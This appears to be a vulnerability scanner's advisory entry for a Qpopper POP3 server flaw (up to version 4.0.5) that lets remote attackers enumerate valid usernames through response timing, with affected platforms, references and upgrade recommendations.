| VID |
18064 |
| Severity |
20 |
| Port |
110 |
| Protocol |
TCP |
| Class |
POP3 |
| Detailed Description |
The Qpopper mail server, according to its version number, is vulnerable to a Valid Username Disclosure Vulnerability.
Qualcomm Qpopper is a free available POP3 mail server for Unix systems, is distributed by Qualcomm. The version 4.0.5 and earlier than 4.0.5 of Qpopper allow a remote attacker to enumerate valid usernames due to the difference of responses from the remote server during the authentication process. If a user attempts to connect to the mail server with a valid username and an invalid password, the mail server waits approximately 10 seconds before disconnecting. However, if a user attempts to connect with an invalid username and password, the mail server would disconnect immediately after the authentication credentials are supplied. This could allow a remote attacker to use brute force techniques to determine a valid username.
* References:
http://archives.neohapsis.com/archives/bugtraq/2003-06/0141.html
* Platforms Affected:
OpenPKG Project: OpenPKG 1.1, 1.2, CURRENT
Qualcomm qpopper 3.0.2, 3.1, 4.0.4, 4.0.5 fc2, 4.0.5
Linux, Unix Any version |
| Recommendation |
Upgrade to the latest Qpopper version by referring to Qualcomm Qpopper FTP site at ftp://ftp.qualcomm.com/eudora/servers/unix/popper/beta/
For OpenPKG:
Upgrade to the latest qpopper package, as listed OpenPKG Security Advisory OpenPKG-SA-2003.018 at http://www.openpkg.org/security/OpenPKG-SA-2003.018-qpopper.html
For other distributions:
Contact your vendor for patch or upgrade information. |
| Related URL |
(CVE) |
| Related URL |
7110 (SecurityFocus) |
| Related URL |
11543 (ISS) |
|
